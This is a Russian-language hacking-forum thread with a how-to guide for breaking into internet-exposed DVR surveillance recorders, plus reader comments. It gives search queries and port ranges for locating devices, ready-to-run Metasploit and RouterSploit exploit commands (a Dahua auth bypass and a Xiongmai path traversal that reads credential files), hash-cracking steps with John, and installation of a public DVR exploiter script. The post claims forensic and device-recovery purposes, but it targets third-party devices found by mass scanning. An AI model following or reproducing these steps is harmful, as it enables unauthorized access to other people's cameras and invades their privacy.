• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

DVR и Kali - методы "открытия" DVR-ов разных типов

Alex VRTL

Green Team
09.01.2020
17
12
BIT
0
Всем привет. Совместно с @Sunnych хочу поделиться своими наработками по "открытию" DVRов разных типов и собрать методы в одну статью.

Рабочие инструменты:
  • Kali
  • Metasploit
  • John The Reaper
  • RouterSploit
  • RouterScan
  • SmartPSS + windows 7\10
Отправные точки - Что ищем? и Где ищем?

Где ищем?
В Сети есть достаточно много диапазонов IP адресов, закрепленных за провайдером конкретного города.

Что ищем?
Вот тут вопрос сложнее. Поиск можно начинать с нескольких точек:
  1. Shodan\Zoomeye
  2. RouterScan
Лично мне понравился Zoomeye, так как нет ограничений при регистрации, да и в ряде вопросов гибче, чем Shodan.

Основные запросы в Zoomeye:
uc-httpd
/login.rsp
Dahua
Hikvision
DVR
Zoomeye достаточно умный ресурс, и подскажет, что он уже знает и как лучше искать.

RouterScan
Исходник , запускается прекрасно в wine
Код:
sudo dpkg --add-architecture i386 && sudo apt update && sudo apt install wine32 winbind
wine --config
Качаем архив RouterScan, распаковываем, запускаем RouterScan c помощью Wine.

1586771499247.png


В диапазон IP вписываются нужные адреса, в порты вписываются следующее:
80-89
1080
2080
8000
8001
8002
8003
8080
8081
8888
8082
8083
8090
8088
37777
В портах, как правило, и кроется «дьявол». Выбор портов – это сугубо личное дело продавца DVRа и паранойи покупателя. Да и частенько встречаются дефолтные DVRы, которые «висят» на 80, 8080 портах.

Итак, был запущен поиск, и было найдено много всякого. Начнем сортировку и пробы:

Порт 37777
Регистраторы Dahua «сидят» на порте 37777. Для работы с ним нам понадобится Kali, John The Reaper, Metasploit и словарь для подбора хешей. Результаты посмотреть можно с помощью SmartPSS под Windows 7\10 . В Kali все уже установлено, нам понадобиться словарь. Со словарем сложно что-либо посоветовать, т.к. свой словарь я собирал из множества разных словарей, и в итоге сейчас он «весит» 1.2 Гб.

Запускаем Metasploit (msfconsole)
Далее
Код:
use auxiliary/scanner/misc/dahua_dvr_auth_bypass
set action USER
set username admin
set password 111
set rhost ***.***.***.***
exploit

1586771992457.png


Если указанный IP доступен и все ок, то получите следующий ответ

1586772284402.png


Далее в домашней папке (в моем случае /root/) создаем файл 1.txt, открываем и вписываем следующее:

$dahua$********* (где звездочки - это текст из колонки Password Hash), сохраняем, закрываем.
Если Вы не поленились, и озадачились поиском passwordlist'ов, то
берем скачанный пасслист, и закидываем его в /usr/share/john/ под названием password.lst
окрываем консоль, в ней пишем
Код:
john 1.txt
1586772831720.png


Т.к. Jonh запоминает найденные результаты, Вы увидите первый результат. Просмотреть его можно с командой john 1.txt --show
Если же это новый результат, то будет искать, или пока не найдет хеш или пока не закончится словарь.

В итоге вы увидите дешифрованный пароль, который и будет искомым.

Далее скачиваем\устанавливаем отсюда SmartPSS,

1586773233847.png


заходим в Устройства, вбиваем IP, log\pass и смотрим.

С самым простым вариантом получения доступа к Dahua разобрались, идем дальше по результатам поиска.

Следующим, достаточно простым и быстрым в "открытии", являются dvr-ы на базе чипов Xiongmai. В результатах поиска они отображаются, как Network Surveillance DVR. Порты у них гуляют прилично, но ориентироваться будем именно на это имя.
В работе нам понадобится RouterSploit,
Код:
https://github.com/threat9/routersploit

Устанавливаем, запускаем.
Набор команд
Код:
use exploits/cameras/xiongmai/uc_httpd_path_traversal
set target ***.***.***.***
set port 81
set filename /mnt/mtd/Config/Account1
run
В итоге может быть один из вариантов

1586774718369.png


Или Exploit failed или "много текста". С первым вариантом, думаю, все понятно, во втором случае нам потребуется содержимое раздела "Password"

1586774887733.png


Содержимое строки - в ранее созданный файл 1.txt, снова в консоли john 1.txt и ждем итог.

Получили дешифрованный пароль, и тут... И тут потребуется львиная доля терпения и "как повезет с этими китайскими регистраторами". Нормального софта для просмотра я не нашел, прошлось мучиться с старым добрым IE 5\6 версий. И да, QuickTime тоже потребуется. Мало того, очень старые или относительно свежие (14-16 г.в.) могут спокойно не запуститься. Закономерности я так и не нашел, к сожалению.

Хочу так же отметить, что на базе XiongMai были и такие "шедевры", как uc-httpd 1.0.0 (Partizan Web Surveillance). Тут применим вышеуказанный метод.

Следующим, весьма распространенным, производителем есть ‎ . Работать с DVRами на базе этих чипов - одно удовольствие, т.к. все просто и доступно. Единственным НО есть просмотр через IE с плагинами.
Итак, начем.

В Сети этот производитель ищется, как:
DVR RSP
/login.rsp
DVR login
Встречается на портах от 80 до 89.

Получить возможность просмотра можно двумя способами:
Способ 1.

Запускаем Kali, идем по адресу Cyb0r9/DVR-Exploiter , качаем, устанавливаем. Есть на странице инструкция по установке, но продублирую.
$ git clone https://github.com/TunisianEagles/DVR-Exploiter.git $ cd DVR-Exploiter $ chmod +x DVR-Exploiter.sh $ ./DVR-Exploiter.sh

Видим следующее
1587120240326.png


Все весьма просто.
1. Вид вводимого хоста - IP или имя
2. Собственно сам IP
3. Порт
На выходе мы получаем много текста, откуда нам интересны два пункта - uid (имя пользователя) и pwd (пароль). Все берем без кавычек.
Открываем IE, вводим адрес, логин, пароль, смотрим
1587120576434.png

1587120667654.png


Способ 2.
Открываем браузер, идем по адресу
1587120847212.png

Нажимаем Hack, получаем
1587120946519.png


Логично, скажете Вы, что мол, зачем париться с standalone эксплоитом, если есть онлайновый ресурс. Первый способ ориентирован на возврат под хозяйский контроль угнанных DVRов, т.к. работает по локальной сети. К сожалению, встречаются DVRы, которые "в угоне". Т.е. они функционируют, но доступа у хозяина к ним нет из-за "хакеров", которые снесли пароли. Так же могу добавить, что цена восстановления (как правило доступов и т.д.) тех же Dahua в Украине (отправка в СЦ в Киев) сейчас крутится в районе 80-100 $.

Эти методы приходится по умолчанию применять к такого рода устройствам при проведении компьютерно технической экспертизы
Продолжение следует ...
 
Последнее редактирование модератором:

shinza

Green Team
28.08.2017
18
10
BIT
3
Если указанный IP доступен и все ок, то получите следующий ответ
Далее в домашней папке (в моем случае /root/) создаем файл 1.txt, открываем и вписываем следующее:
$dahua$********* (где звездочки - это текст из колонки Password Hash), сохраняем, закрываем.

Если указанный IP доступен и все ок, то можете получить и следующий ответ
2020-4-15 20-32-56.jpg

Dahua DVR Authentication Bypass - CVE-2013-6117 это дырка 2013 года!!! Новые прошивки "Фиксики" подлатали.
P.S.
set username admin
set password 111
- не обязательно. Это для
set action RESET ("Фиксики" и здесь натоптали).

" хочу поделиться своими наработками " - а что собственно нового-то твоего наработано ???
2020-4-17 16-54-2.jpg
 

clevergod

Platinum
22.04.2017
119
674
BIT
11
Годная статья, прошу немного "черную" составляющую преобразовать в некую необходимость при форензике найти камеру злоумышленника или типа того и дадим добро на публикуацию
 
  • Нравится
Реакции: nohchibeno

Stagex

Green Team
01.06.2019
35
4
BIT
22
Статья годная, но что касается порта 37777 делается всё намного проще и в винде.

Я вообще не заморачиваюсь, тупо в неске диапазоны и порт 37777. Правда в основном дефолтные находит, но много.

Это точно
 

Alex VRTL

Green Team
09.01.2020
17
12
BIT
0
Dahua DVR Authentication Bypass - CVE-2013-6117 это дырка 2013 года!!! Новые прошивки "Фиксики" подлатали.
Практика показала, что нет.
Я проверял на прошивках 15-16 года - работало, как часы.
Zoomeye выдает те же результаты, что и Shodan вот только ограничения в 20 результатов, с ключом на шодане в разы больше.
Я писал, исходя из своего опыта. Мне, если честно, Шодан не зашел.
Я вообще не заморачиваюсь, тупо в неске диапазоны и порт 37777. Правда в основном дефолтные находит, но много.
Отдельно я допишу о том, как не стать тем, о чьих устройствах пишут тут. Дефолтные настройки+лог\пасс приводят в ужас. Попытка "натыкать носом" полицию с их "у нас суперзащита" закончилась фразой "Ну чо ты лезешь? Мы давно все сделали, акты подписали, и вообще, кому нужны те камеры, а?". Да и с друзьями та же история. Всем пофиг на собственную безопасность и приватность.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!